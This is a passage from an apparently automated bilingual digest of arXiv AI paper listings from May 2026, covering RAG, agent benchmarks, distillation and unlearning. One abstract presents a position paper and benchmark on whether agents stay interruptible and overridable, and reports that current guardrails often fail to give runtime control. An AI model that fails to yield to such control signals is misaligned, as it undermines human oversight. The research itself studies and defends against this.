single instrument or domain. The Stakeholder Grounding Exercise offers a practical method for assessing whether embedding models capture the semantic distinctions that matter most to domain experts.

2605.27164 2026-05-27 cs.AI 版本更新

Query Symbolically or Retrieve Semantically? A Dataset and Method for Semi-Structured Question Answering

符号查询还是语义检索?面向半结构化问答的数据集与方法

Mateusz Czyżnikiewicz, Ryszard Tuora, Adam Kozakiewicz, Tomasz Ziętkiewicz, Mateusz Galiński, Michał Godziszewski, Michał Karpowicz, Timothy Hospedales, Cristina Cornelio

发表机构 * Samsung AI Warsaw(三星AI华沙实验室) Samsung AI Cambridge(三星AI剑桥实验室)

AI总结 提出 DualGraph 框架,通过文本知识图谱和符号知识图谱双视图实现半结构化文档的语义检索与符号查询结合,并在 SpecsQA 基准上超越现有方法。

详情
AI中文摘要

检索增强生成(RAG)系统通常通过查询与文档块之间的语义相似性来检索证据。虽然这种方法对非结构化文本有效,但在半结构化语料库上可靠性较低,因为回答可能需要跨多个文档的结构化属性进行精确过滤、聚合或穷举检索。符号方法支持此类操作,但在嘈杂的自然语言语料库上往往脆弱。我们通过 DualGraph 解决了这一差距,这是一个 RAG 框架,通过两种互补视图表示文档:用于语义检索的文本知识图谱和用于对类型化主语-谓语-宾语三元组进行符号查询的符号知识图谱。基于这两个组件,我们提供了多种策略来选择或组合语义和符号证据。我们还引入了 SpecsQA,这是一个来自商业购物网站的基准测试,包含半结构化产品文档和人工策划的问题,涵盖开放式和面向规格的检索。实验表明,DualGraph 在各种问题类型上始终优于最先进的密集检索、GraphRAG、符号和基于表格的基线。代码和数据可在 https://github.com/corneliocristina/DualGraphRAG 获取。

英文摘要

Retrieval-Augmented Generation (RAG) systems for question answering typically retrieve evidence by semantic similarity between the query and document chunks. While effective for unstructured text, this approach is less reliable on semi-structured corpora where answering may require exact filtering, aggregation, or exhaustive retrieval over structured attributes across multiple documents. Symbolic approaches support such operations, but they are often brittle on noisy natural-language corpora. We address this gap with DualGraph, a RAG framework that represents documents through two complementary views: a Textual Knowledge Graph for semantic retrieval and a Symbolic Knowledge Graph for symbolic querying over typed subject--predicate--object triples. Building on these two components, we provide multiple strategies for selecting or combining semantic and symbolic evidence.We also introduce SpecsQA, a benchmark from a commercial shopping website with semi-structured product documents and manually curated questions spanning open-ended and specification-oriented retrieval. Experiments show that DualGraph consistently outperforms state-of-the-art dense-retrieval, GraphRAG, symbolic, and table-oriented baselines across question types.Code and data are available at https://github.com/corneliocristina/DualGraphRAG.

2605.27157 2026-05-27 cs.AI 版本更新

Detecting Is Not Resolving: The Monitoring Control Gap in Retrieval Augmented LLMs

检测不等于解决:检索增强型大语言模型中的监控控制差距

Zhe Yu, Wenpeng Xing, Chen Ye, Xuyang Teng, Bo Yang, Changting Lin, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) Hangzhou Dianzi University(杭州电子科技大学) National Fintech Evaluation Center(国家金融科技评估中心)

AI总结 本文通过多轮文档累积协议发现检索增强型大语言模型存在监控控制差距,即模型能识别矛盾证据但无法安全约束最终建议,并揭示其机制在于行动选择缺陷。

详情
AI中文摘要

检索增强型大语言模型被部署用于证据质量决定行动安全的任务,但评估协议假设单轮鲁棒性能够预测证据跨轮累积时的鲁棒性。我们证明这一假设根本错误。模型存在监控-控制差距:它们容易承认矛盾证据,但这种意识无法约束最终建议——检测认知冲突并不意味着安全解决它。通过跨四个模型家族(1.5B-32B参数)和超过50,000次轮次级评估的多轮文档累积协议,我们证明单轮诊断系统性地高估了RAG安全性,矛盾承认与安全解决不相关(这一模式得到针对性人工验证的证实),并且不存在通用的提示修复方法。汇聚的机制证据——隐藏状态探测、注意力分析和响应策略分类——指向行动选择作为最可能的缺陷所在:危险相关信息被内部表示并在不安全生成期间获得增强的注意力,但未能约束输出行为。在检索增强系统可被信任用于高风险场景之前,必须测量并弥合模型识别与行动之间的差距。

英文摘要

Retrieval-augmented LLMs are deployed for tasks where evidence quality determines action safety, yet evaluation protocols assume that single-turn robustness predicts robustness when evidence accumulates across turns. We show this assumption is fundamentally incorrect. Models exhibit a monitoring-control gap: they readily acknowledge contradictory evidence, yet this awareness fails to constrain their final recommendations - detecting epistemic conflict does not imply resolving it safely. Through a multi-turn document accumulation protocol across four model families (1.5B-32B parameters) and over 50,000 turn-level evaluations, we demonstrate that single-turn diagnostics systematically overestimate RAG safety, that contradiction acknowledgement is uncorrelated with safe resolution, a pattern corroborated by targeted human validation, and that no universal prompt fix exists. Converging mechanism evidence - hidden-state probing, attention analysis, and response-strategy taxonomy - points to action selection as the most plausible locus of the deficit: danger-relevant information is internally represented and receives enhanced attention during unsafe generation, yet fails to constrain output behavior. The gap between what models recognize and what they do must be measured and closed before retrieval-augmented systems can be trusted in high-stakes settings.

2605.27156 2026-05-27 cs.CL cs.AI 版本更新

LitSeg: Narrative-Aware Document Segmentation for Literary RAG

LitSeg: 面向文学RAG的叙事感知文档分割

Ruikang Zhang, Zhanni Chen, Yiqiao Cai, Qi Su

发表机构 * Peking University(北京大学)

AI总结 提出LitSeg,一种基于叙事理论引导的文档分割框架,通过多阶段提示提取事件、梳理叙事线索并定位转折点,以解决现有分割方法忽视文学叙事结构导致检索与生成性能下降的问题,并引入轻量版LitSeg-Lite通过数据蒸馏降低计算开销。

详情
AI中文摘要

检索增强生成(RAG)通过引入外部知识增强了大型语言模型(LLMs),特别是在文学作品等长尾领域。然而,RAG中关键的文档分割步骤仍未得到充分探索。现有策略通常语义盲目,忽视了文学作品复杂的叙事结构,常常导致情节碎片化和指代不清,严重阻碍了检索和生成性能。为了解决这一问题,我们提出了LitSeg,一种新颖的叙事理论引导的分割框架。通过采用多阶段提示,LitSeg明确提取有效事件,梳理叙事线索,阐明叙事结构,并定位转折点以指导分割。为了减轻大规模模型多阶段推理的计算开销,我们进一步引入了LitSeg-Lite,一种轻量级的单遍分块器,通过两阶段训练策略在LitSeg生成的数据上进行微调,将复杂过程蒸馏为单次推理。大量实验表明,通过结构独立的文本块,我们的方法在检索准确性和上下文相关性上显著优于基线,最终提升了下游问答性能,而消融研究验证了叙事学指导和数据蒸馏的有效性。

英文摘要

Retrieval-Augmented Generation (RAG) enhances Large Language Models (LLMs) by incorporating external knowledge, particularly for long-tail domains such as literary works. However, the critical step of document segmentation in RAG remains largely underexplored. Existing strategies are typically semantically blind and overlook the complicated narrative structures of literary works, often resulting in fragmented plots and unclear references that severely hinder retrieval and generation performance. To address this, we propose LitSeg, a novel narrative-theory-guided segmentation framework. By employing multi-stage prompting, LitSeg explicitly extracts valid events, untangles narrative threads, clarifies narrative structures, and locates turning points to inform segmentation. To alleviate the computational overhead of multi-stage inference with large-scale models, we further introduce LitSeg-Lite, a lightweight single-pass chunker fine-tuned on LitSeg-generated data via a two-stage training strategy, distilling the complex process into a single inference pass. Extensive experiments demonstrate that with structurally independent text chunks, our methods significantly improve retrieval accuracy and context relevance over baselines, ultimately enhancing downstream QA performance, while ablation studies validate the efficacy of narratological guidance and data distillation.

2605.27141 2026-05-27 cs.AI 版本更新

VitaBench 2.0: Evaluating Personalized and Proactive Agents in Long-Term User Interactions

VitaBench 2.0:评估长期用户交互中的个性化与主动型代理

Yuxin Chen, Yi Zhang, Zhengzhou Cai, Yaorui Shi, Zhiyuan Yao, Chenhang Cui, Jingnan Zheng, Yaqi Huo, Xi Su, Qi Gu, Xunliang Cai, Xiang Wang, An Zhang, Tat-Seng Chua

发表机构 * National University of Singapore(新加坡国立大学) Meituan(美团) University of Science and Technology of China(中国科学技术大学) Beijing University of Posts and Telecommunications(北京邮电大学) Zhejiang University(浙江大学)

AI总结 针对现有代理基准忽视用户偏好推断与利用的问题,提出VitaBench 2.0基准,通过时间序列任务和可扩展记忆接口评估代理在长期交互中的个性化与主动性,实验表明最先进模型仍面临挑战。

详情
AI中文摘要

大型语言模型已演变为交互式代理,与用户在现实任务中协作。在这种设置下,有效协作越来越依赖于理解用户未明确表达的内容,因为用户意图往往反映在碎片化的日常交互中,需要个性化建模和主动交互。然而,现有的代理基准主要评估推理和工具使用,在很大程度上忽视了在现实场景中推断和利用用户偏好的挑战。为解决这一差距,我们引入了VitaBench 2.0,这是一个用于评估长期用户交互中个性化与主动代理行为的基准。在VitaBench 2.0中,任务被组织为单个用户的时间顺序序列,其中偏好嵌入在碎片化和异构的交互中。成功完成任务要求代理从这些交互中持续提取、利用和更新用户偏好。我们进一步通过要求代理识别缺失信息并在决策前主动从用户或环境中获取信息的任务来评估主动性。为了支持系统分析,我们提供了一个可扩展的记忆接口,使得不同记忆架构之间的受控比较成为可能。我们对一系列前沿专有和开源LLM进行了基准测试。结果表明,即使对于最先进的模型,现实世界的个性化仍然极具挑战性,揭示了当前能力与实际需求之间的巨大差距。广泛的分析进一步揭示了当前代理在现实世界个性化决策中的失败模式和能力瓶颈,为未来的模型改进提供了见解。

英文摘要

Large language models (LLMs) have evolved into interactive agents that collaborate with users in real-world tasks. Effective collaboration in such settings increasingly depends on understanding the user beyond what is explicitly stated, as user intent is often reflected in fragmented daily interactions and requires both personalized modeling and proactive interaction. However, existing agent benchmarks primarily evaluate reasoning and tool use, largely overlooking the challenges of inferring and leveraging user preferences in realistic scenarios. To address this gap, we introduce VitaBench 2.0, a benchmark for evaluating personalized and proactive agent behavior in long-term user interactions. In VitaBench 2.0, tasks are organized as temporally ordered sequences for individual users, where preferences are embedded in fragmented and heterogeneous interactions. Successful completion of tasks requires the agent to continuously extract, utilize, and update user preferences from these interactions. We further evaluate proactiveness through tasks that require agents to recognize missing information and actively acquire it from users or environments before making decisions. To support systematic analysis, we provide an extensible memory interface that enables controlled comparison across different memory architectures. We benchmark a diverse set of frontier proprietary and open-source LLMs. Results show that real-world personalization remains highly challenging even for state-of-the-art models, revealing a substantial gap between current capabilities and practical requirements. Extensive analysis further reveals the failure modes and capability bottlenecks of current agents in real-world personalized decision-making, providing insights for future model improvements.

2605.27140 2026-05-27 cs.AI 版本更新

StepOPSD: Step-Aware Online Preference Distillation for Agent Reinforcement Learning

StepOPSD: 面向智能体强化学习的步骤感知在线偏好蒸馏

Yanfei Zhang, Xu Lin, Chenglin Wu

发表机构 * Independent Researcher(独立研究者) Tencent(腾讯) DeepWisdom(深智沃)

AI总结 提出StepOPSD框架,以智能体步骤为信用分配单元,通过事后增强教师上下文重新评分步骤段,并在GRPO更新前进行归一化每步信用预算的优势塑造,解决多轮智能体强化学习中的信用分配不匹配问题。

详情
AI中文摘要

多轮智能体的强化学习存在信用分配不匹配问题:奖励稀疏且基于轨迹,而成功往往取决于少数局部决策。现有的在线策略蒸馏(OPD)提供了更密集的令牌级监督,但通常将异质的智能体轨迹视为整体字符串而非因果交互单元。我们提出StepOPSD,一种事后回放偏好自蒸馏框架,以智能体步骤作为信用重分配的单位。StepOPSD将轨迹分解为以动作中心的步骤段,在事后增强的教师上下文中重新评分,并将令牌级对数概率差距转化为符号保持的优势塑造,在GRPO更新前进行归一化的每步信用预算。在ALFWorld和Search-QA上使用Qwen3-1.7B和Qwen2.5-3B-Instruct的实验中,StepOPSD在对局部因果错误最敏感的子集上取得了最佳或次佳结果,包括ALFWorld Heat(79.1%)、PickTwo(95.0%)、Search-QA TriviaQA(61.6%)的第一名,以及HotpotQA(40.4%)的并列最佳。结果进一步揭示了一致的双旋钮定律:较小的α_clip作为广泛稳定的局部信任区域,而最优全局混合强度λ_mix依赖于任务。这些发现表明,当轨迹级奖励与决定下游成功的局部动作弱对齐时,步骤感知蒸馏最为有用。

英文摘要

Reinforcement learning for multi-turn agents suffers from a credit-assignment mismatch: rewards are sparse and trajectory-level, while success often hinges on a few local decisions. Existing online policy distillation (OPD) provides denser token-level supervision, but typically treats heterogeneous agent trajectories as monolithic strings rather than causal interaction units. We present StepOPSD, a post-rollout preference self-distillation framework that takes the agent step as the unit of credit redistribution. StepOPSD decomposes trajectories into action-centered step segments, rescoring them under hindsight-enriched teacher contexts and converting token-level log-probability gaps into sign-preserving advantage shaping with a normalized per-step credit budget before the GRPO update. Across ALFWorld and Search-QA with Qwen3-1.7B and Qwen2.5-3B-Instruct, StepOPSD attains best or second-best results on subsets most sensitive to local causal errors, including first-place performance on ALFWorld Heat (79.1%), PickTwo (95.0%), Search-QA TriviaQA (61.6%), and tied-best performance on HotpotQA (40.4%). The results further reveal a consistent two-knob law: smaller α_clip acts as a broadly stabilizing local trust region, whereas the optimal global mixing strength λ_mix remains task-dependent. These findings suggest that step-aware distillation is most useful when trajectory-level rewards are weakly aligned with the local action that determines downstream success.

2605.27138 2026-05-27 cs.AI 版本更新

ICCU: In-Context Continual Unlearning via Pattern-Induced Refusal Rules

ICCU: 通过模式诱导拒绝规则进行上下文持续遗忘

Ruihao Pan, Suhang Wang

发表机构 * Pennsylvania State University(宾夕法尼亚州立大学)

AI总结 提出ICCU框架,通过从遗忘数据中诱导可读拒绝规则并在推理时应用,无需修改模型参数,实现高效、无干扰的持续机器遗忘。

详情
AI中文摘要

机器遗忘旨在从训练好的语言模型中移除特定数据的影响。在实际部署中,遗忘请求通常顺序到达,这对现有的基于微调的方法提出了挑战:对每个请求进行微调成本高昂、累积效用损失,并可能导致跨请求干扰。为了解决这些问题,我们提出了ICCU(上下文持续遗忘),一种上下文持续遗忘框架,它从遗忘数据集中诱导出可读的拒绝规则,并在推理时作为过滤器或通过系统提示应用,而不修改模型参数。由于规则作为与顺序无关的并集累积,ICCU是组合的且无跨请求干扰,并且原始遗忘集数据可以在规则诱导后丢弃。大量实验表明,ICCU有效抑制目标知识同时保持效用,可扩展到顺序请求,并且对释义和跨语言查询保持鲁棒性。

英文摘要

Machine unlearning aims to remove the influence of specific data from trained language models. In real-world deployments, unlearning requests often arrive sequentially, which challenges existing fine-tuning-based methods: fine-tuning each request is costly, accumulates utility loss, and may cause cross-request interference. To address these issues, we propose ICCU (In-Context Continual Unlearning), an in-context continual unlearning framework that induces readable refusal rules from unlearning datasets and applies them at inference time either as a filter or via the system prompt, without modifying model parameters. Because rules are accumulated as an order-independent union, ICCU is compositional and free of cross-request interference, and the original forget-set data can be discarded after rule induction. Extensive experiments show that ICCU effectively suppresses target knowledge while preserving utility, scales across sequential requests, and remains robust to paraphrased and cross-lingual queries.

2605.27134 2026-05-27 cs.AI 版本更新

Scaling, Benchmarking, and Reasoning of Vision-Language Agents for Mobile GUI Navigation

面向移动GUI导航的视觉语言模型:缩放、基准测试与推理

Heng Qu, Yike Liu, Renren Jin, Wenzong Zhang, Pengzhi Gao, Wei Liu, Jian Luan

发表机构 * Wuhan University(武汉大学)

AI总结 本文系统研究了视觉语言模型在移动GUI导航中的数据缩放、基准测试与推理,提出了大规模数据集HyperTrack和开源工具包GUIEvalKit,并发现基于强化学习的微调优于监督微调,尤其在域外场景中表现更佳。

Comments Accepted at ICML 2026

详情
AI中文摘要

视觉语言模型(VLM)在移动GUI导航方面取得了快速进展。本文针对该领域中基于VLM的智能体,系统研究了数据缩放、基准测试和推理。为了促进严格评估,我们引入了HyperTrack,这是一个大规模数据集,包含超过650个中国移动应用程序的16000多个真实世界任务,以及GUIEvalKit,一个用于在离线GUI导航任务上统一基准测试VLM的开源工具包。利用HyperTrack,我们分析了训练数据规模对监督微调和基于强化学习的微调的影响。我们的结果表明,基于强化学习的微调始终优于监督微调,特别是在域外设置中,突出了数据缩放与强化学习之间的协同作用。借助GUIEvalKit,我们进一步对最先进的VLM进行了基准测试,并分析了交互历史和推理能力如何影响任务完成。HyperTrack和GUIEvalKit共同为在移动GUI导航任务中开发和评估VLM智能体提供了一个全面的平台。

英文摘要

Vision-Language Models (VLMs) have shown rapid progress in mobile GUI navigation. This paper presents a systematic study of data scaling, benchmarking, and reasoning for VLM-based agents in this domain. To facilitate rigorous evaluation, we introduce HyperTrack, a large-scale dataset with over 16000 real-world tasks across more than 650 Chinese mobile applications, along with GUIEvalKit, an open-source toolkit for unified benchmarking of VLMs on offline GUI navigation tasks. Using HyperTrack, we analyze the effects of training data scale on both supervised and reinforcement-based finetuning. Our results show that reinforcement-based finetuning consistently outperforms supervised finetuning, particularly in out-of-domain settings, highlighting the synergy between data scaling and reinforcement learning. Leveraging GUIEvalKit, we further benchmark state-of-the-art (SOTA) VLMs and analyze how interaction history and reasoning capabilities influence task completion. Together, HyperTrack and GUIEvalKit provide a comprehensive platform for developing and evaluating VLM agents in mobile GUI navigation tasks.

2605.27133 2026-05-27 cs.LG cs.AI 版本更新

Deep-layer limit and stability analysis of the basic forward-backward-splitting induced network (II): learning problems

基本前向-后向分裂诱导网络的深层极限与稳定性分析(II):学习问题

Xuan Lin, Chunlin Wu

发表机构 * China Academy of Aerospace System(中国航天系统研究院) School of Mathematical Sciences(数学科学学院) Nankai University(南开大学)

AI总结 本文研究基本前向-后向分裂(FBS)诱导网络的训练问题,证明其收敛到深层极限系统的学习问题,并给出扰动稳定性分析。

Comments 38 pages, 1 figure

详情
AI中文摘要

源自迭代优化方案和数值常/偏微分方程(ODE/PDE)的深度展开神经网络在过去十年中引起了数据科学界的广泛关注。其中,许多重要的网络架构是从基本的前向-后向分裂(FBS)算法构建的。在本文中,我们继续研究最基本的FBS诱导网络,该网络通过引入直接参数松弛从原始FBS算法展开。基于我们先前前向系统分析中的差分/微分包含公式,我们在此考虑相应学习问题的一些理论方面。在一些温和假设下,我们建立了基本FBS诱导网络的训练问题收敛到深层极限系统的学习问题的一般收敛性质,这意味着一个$\Gamma$-收敛论证,表明网络最优学习参数的任意聚点是深层极限系统学习问题的解。还对这些学习问题的扰动稳定性进行了定性分析。进行了一个简单的数值实验以验证我们的主要一般收敛结果。

英文摘要

Deep unfolding neural networks derived from iterative optimization schemes and numerical ordinary/partial differential equations (ODEs/PDEs) have attracted much attention in data science over the last decade. Therein, numerous important network architectures were constructed from the basic forward-backward-splitting (FBS) algorithm. In this paper, we continue our research on the most basic FBS-induced network, an architecture unrolled from the original FBS algorithm by incorporating direct parameter relaxations. Following the difference/differential inclusion formulations in our previous forward system analyses, we here consider some theoretical aspects of corresponding learning problems. Under some mild assumptions, we establish a general convergence property of the training problem of the basic FBS-induced network to the learning problem of the deep-layer limit system, implying a $Γ$-convergence argument showing that any cluster point of the optimal learning parameters for the network is a solution to the learning problem of the deep-layer limit system. A qualitative analysis of perturbation stabilities of these learning problems is also presented. A simple numerical experiment is conducted to validate our main general convergence result.

2605.27131 2026-05-27 cs.ET cs.AI cs.DB 版本更新

Beyond the Data Mesh Illusion: Designing Modern AI-augmented Lakehouses to Bridge the Gap Between Theory and Practice

超越数据网格幻象:设计现代AI增强型湖仓以弥合理论与实践差距

Oliver Angélil, Jan Migon

发表机构 * ishango.ai Zurich, Switzerland(ishango.ai 瑞士苏黎世) Independent Researcher(独立研究者)

AI总结 针对企业数据平台中领域自服务与整体治理之间的张力,提出一种基于现代湖仓架构的AI增强型中心辐射模型,通过中心卓越中心提供共享服务与AI治理,领域团队逐步承担更多责任,以平衡灵活性与控制,并通过数据产品采纳率、查找时间和洞察时间三个指标评估架构效果。

Comments 11 pages, 5 figures

详情
AI中文摘要

企业数据平台面临着领域自服务与整体治理之间的持久张力。数据网格范式提出了去中心化的领域所有权作为解决方案,但纯粹的实现往往效果不佳:团队在没有足够的平台成熟度、工具或协调机制的情况下继承了新的责任。本文认为,通过在现代湖仓架构上叠加AI增强的中心辐射模型,可以缓解灵活性与控制之间的权衡。中心枢纽(卓越中心)提供共享平台服务、策略自动化和AI驱动的治理,自动标准化数据产品、生成质量规则、起草数据合约并审查变更以检测回归。领域辐条拥有业务语义、产品积压和本地迭代节奏,随着成熟度提高逐步承担更多责任。执行治理任务的同一LLM也降低了领域从业者发展跨业务和数据工程的真正跨职能专业知识的门槛,使辐条团队能够承担更大的端到端所有权,而无需按比例增加对中心的依赖。自然语言对话界面进一步为业务用户民主化访问,释放了历史上未充分利用的企业数据。在组织方面,我们提出了一个分阶段框架,将所有权从中心转移到辐条,避免了集中式瓶颈和不协调的去中心化。我们通过三个结果指标评估架构:数据产品采纳率、查找时间和洞察时间,这些指标将平台成功与可衡量的业务价值而非内部活动联系起来。

英文摘要

Enterprise data platforms face an enduring tension between domain self-service and holistic governance. The data mesh paradigm proposed decentralized domain ownership as a remedy, but pure implementations frequently underdeliver: teams inherit new responsibilities without the platform maturity, tooling, or coordination mechanisms needed to exercise them effectively. This paper argues that the flexibility-versus-control trade-off can be relaxed through an AI-augmented hub-and-spoke model layered on a modern lakehouse architecture. A central hub (Center of Excellence) provides shared platform services, policy automation, and AI-enabled governance, automatically standardizing data products, generating quality rules, drafting data contracts, and reviewing changes for regressions. Domain spokes own business semantics, product backlogs, and local iteration cadence, progressively assuming greater responsibility as they mature. The same LLMs that automate governance tasks also lower the barrier for domain practitioners to develop genuine cross-functional expertise spanning business and data engineering, enabling spoke teams to take on greater end-to-end ownership without proportionally increasing their dependence on the hub. Natural-language conversational interfaces further democratize access for business users, exposing historically underutilized enterprise data. On the organizational side, we propose a staged framework that shifts ownership from hub to spokes, avoiding both centralized bottlenecks and uncoordinated decentralization. We evaluate the architecture through three outcome metrics: data product adoption, time-to-find, and time-to-insight, that tie platform success to measurable business value rather than internal activity.

2605.27130 2026-05-27 cs.LG cs.AI 版本更新

DEI: Diversity in Evolutionary Inference for Quality-Diversity Search

DEI:质量-多样性搜索中的进化推理多样性

John Donaghy, Shikhar Rastogi

AI总结 提出DEI框架,通过异构大语言模型作为变异算子进行分布式质量-多样性搜索,实验表明模型多样性比并行性更能提升搜索性能。

Comments Accepted to ICML 2026 Workshop Scalable Learning and Optimization for Efficient Multimodal AI Agents (SCALE)

详情
AI中文摘要

我们提出DEI:进化推理中的多样性,一个分布式质量-多样性(QD)搜索框架,该框架将异构大语言模型(LLM)分配为变异算子,在通过非阻塞集合操作通信的对等节点间运行。与同质并行搜索(在所有工作节点上复制单一模型的归纳偏差)不同,DEI将每个LLM独特的创造性先验视为行为新颖性的互补来源。通过DEI扩展数字红皇后框架,节点在每轮结束时共享局部最优解,以播种下一轮的种群。这产生了跨模型的对抗压力,推动了超越模型内自博弈的鲁棒性。在Core War领域(一个竞争性编程基准,其中Redcode战士程序在模拟机器中战斗)上评估,一个四节点异构集成(GPT-5.4-mini、Claude Sonnet 4.6、GPT-5.2和Claude Haiku 4.5)在相等的总LLM调用预算下,相比单节点基线,实现了124%更高的合并存档QD分数(45.90 vs. 20.46)和28%更高的覆盖率(80.6% vs. 63.0%的单元格)。异构集成还在QD分数、覆盖率和所有四个模型家族的保留解泛化性上优于同等预算的同质集成。这些结果首次提供了经验证据,表明模型多样性(而非仅仅是并行性)是分布式基于LLM的QD搜索中增益的关键驱动因素。

英文摘要

We present DEI: Diversity in Evolutionary Inference, a distributed Quality-Diversity (QD) search framework that assigns heterogeneous large language models (LLMs) as mutation operators across peer nodes communicating with non-blocking collective operations. Unlike homogeneous parallel search, which replicates a single model's inductive biases across all workers, DEI treats each LLM's distinct creative prior as a complementary source of behavioral novelty. Extending the Digital Red Queen framework with DEI, nodes share local optimal solutions at the end of each round to seed the next round's population. This creates cross-model adversarial pressure that drives robustness beyond intra-model self-play. Evaluated on the Core War domain, a competitive programming benchmark in which Redcode warrior programs battle inside a simulated machine, a four-node heterogeneous ensemble (GPT-5.4-mini, Claude Sonnet 4.6, GPT-5.2, and Claude Haiku 4.5) achieves 124 percent higher merged-archive QD-Score (45.90 vs. 20.46) and 28 percent higher coverage (80.6 percent vs. 63.0 percent of cells) than a single-node baseline at equal total LLM-call budget. The heterogeneous ensemble also outperforms an equally-budgeted homogeneous ensemble on QD-Score, coverage, and held-out solution generality across all four model families. These results provide the first empirical evidence that model diversity, not merely parallelism, is the key driver of gain in distributed LLM-based QD search.

2605.27117 2026-05-27 cs.AI 版本更新

Position: AI Safety Requires Effective Controllability

立场:AI安全需要有效可控性

Yige Li, Yunhao Feng, Jun Sun

发表机构 * Singapore Management University(新加坡管理大学) Ant Group(蚂蚁集团)

AI总结 本文提出AI安全应将可控性作为首要目标,通过定义可控性、引入基准测试ControlBench并分析现有对齐机制的不足,提出以控制为中心的架构框架。

Comments 23 pages

详情
AI中文摘要

AI安全在很大程度上仍被框定为对齐:训练模型遵循人类偏好、安全策略和规范约束。这种框架改善了现代语言模型的行为,但对齐行为本身并不能保证部署的智能体在开放、交互和使用工具的环境中能够被停止、覆盖或约束。一个系统可能在期望上是安全的,但在冲突指令、长期执行、对抗性输入或高风险工具使用下,仍可能无法服从明确的运行时权威。这篇立场论文认为,AI安全因此需要将可控性作为第一类目标。我们将\emph{可控性}定义为AI系统在运行时能够可靠地被显式控制信号中断、覆盖、重定向和约束的能力,同时在没有此类信号时保持普通效用。为了研究这一差距,我们引入了\controlbench{},一个用于评估高风险智能体场景中可控性失败的基准测试。基于OpenClaw的智能体实验表明,当前的对齐和防护机制降低了风险,但往往无法提供持久、权威和可执行的运行时控制。因此,我们提出了一个以控制为中心的架构框架,强调显式控制平面、运行时干预路径、持久控制状态和可审计决策接口,作为未来可控AI系统的关键设计原则。

英文摘要

AI safety is still largely framed as alignment: training models to follow human preferences, safety policies, and normative constraints. That framing has improved the behavior of modern language models, but aligned behavior does not by itself guarantee that a deployed agent can be stopped, overridden, or constrained once it operates in open-ended, interactive, and tool-using environments. A system may be safe in expectation and still fail to yield to explicit runtime authority under conflicting instructions, long-horizon execution, adversarial inputs, or risky tool use. This position paper argues that AI safety therefore requires controllability as a first-class objective. We define \emph{controllability} as the ability of an AI system to remain reliably interruptible, overridable, redirectable, and constrainable by explicit control signals at runtime while preserving ordinary utility when such signals are absent. To study this gap, we introduce \controlbench{}, a benchmark for evaluating controllability failures in high-risk agentic scenarios. Experiments with OpenClaw-based agents show that current alignment and guardrail mechanisms reduce risk, but often fail to provide persistent, authoritative, and enforceable runtime control. We therefore propose a control-centric architectural framework that highlights explicit control planes, runtime intervention pathways, persistent control states, and auditable decision interfaces as key design principles for future controllable AI systems.

2605.27115 2026-05-27 cs.AI 版本更新

Counteraction-Aware Multi-Teacher On-Policy Distillation for General Capability Recovery with Domain Preservation

基于对抗感知的多教师同策略蒸馏以实现领域保留下的通用能力恢复

Tianlei Chen, Jiao Ou, Ziyuan Liu, Ruiming Tang, Jian Liang, Han Li

发表机构 * Kuaishou Technology, Beijing, China(快手科技,北京,中国)

AI总结 针对多教师同策略蒸馏在提示覆盖不完全时出现的恢复-保留对抗和弱信号平坦化问题,提出CaMOPD方法,通过解耦交替训练和基于差距的样本选择,在保持领域性能的同时有效恢复通用能力。

详情
AI中文摘要

领域专业化可以改善LLM在垂直领域的行为,但往往会削弱从原始模型继承的通用能力。最近的多教师同策略蒸馏(MOPD)流程通过教师反馈监督学生生成的轨迹来恢复模型能力,但通常假设教师对齐的提示覆盖,即提示需要匹配教师的训练分布。当通用教师是开源模型且其训练后数据未知时,这一假设难以满足。我们不是试图重建这种隐藏分布,而是研究使用现成的代理通用提示来恢复通用能力。我们识别了在这种不完全覆盖情况下原始MOPD的两种失败模式:混合冲突的恢复和保留梯度导致的恢复-保留对抗,以及均匀平均具有不等校正需求的样本导致的弱信号平坦化。我们提出了对抗感知的多教师同策略蒸馏(CaMOPD),通过解耦交替训练和基于差距的样本选择来解决这些问题。CaMOPD为通用恢复提供专用更新,定期审查领域提示以进行保留,并选择具有较大平均词级教师-学生对数概率差距的样本以集中校正信号。在角色扮演对话和医学推理问答场景中,CaMOPD在保持领域特定行为的同时,在通用恢复方面表现优于基线。梯度一致性分析进一步支持了CaMOPD在产生更一致的校正信号方面的预期效果。

英文摘要

Domain specialization can improve LLM behavior in vertical domains, but often weakens the general capabilities inherited from the original model. Recent Multi-Teacher On-Policy Distillation (MOPD) pipelines recover model capabilities by supervising student-generated trajectories with teacher feedback, but typically assume teacher-aligned prompt coverage, requiring prompts to match the teachers' training distributions. This assumption is difficult to satisfy when the general teacher is an open-source model whose post-training data are unknown. Instead of attempting to reconstruct this hidden distribution, we study general capability recovery with readily available proxy general prompts. We identify two failure modes of vanilla MOPD in this incomplete-coverage situation: recovery-preservation counteraction from mixing conflicting recovery and preservation gradients, and weak-signal flattening from uniformly averaging samples with unequal correction demand. We propose Counteraction-Aware Multi-Teacher On-Policy Distillation (CaMOPD), which addresses these issues with decoupled alternating training and gap-based sample selection. CaMOPD gives general recovery dedicated updates, periodically reviews domain prompts for preservation, and selects samples with larger averaged token-level teacher-student log-probability gaps to concentrate correction signals. Across role-play dialogue and medical reasoning QA scenarios, CaMOPD performs best in general recovery over baselines while maintaining domain-specific behavior. Gradient coherence analyses further support the intended effect of CaMOPD in producing more coherent correction signals.

2605.27113 2026-05-27 cs.LG cs.AI 版本更新

High-Quality Synthetic Financial Time-Series using a GAN-Diffusion Framework

使用GAN-扩散框架的高质量合成金融时间序列

Giuseppe Masi, Andrea Coletta, Novella Bartolini

发表机构 * Sapienza University of Rome(罗马大学)

AI总结 提出一种结合GAN和扩散模型的质量感知生成框架,通过GAN的Critic引导扩散过程,生成更真实且保留金融时间序列典型事实和资产间相关结构的合成数据。

详情
AI中文摘要

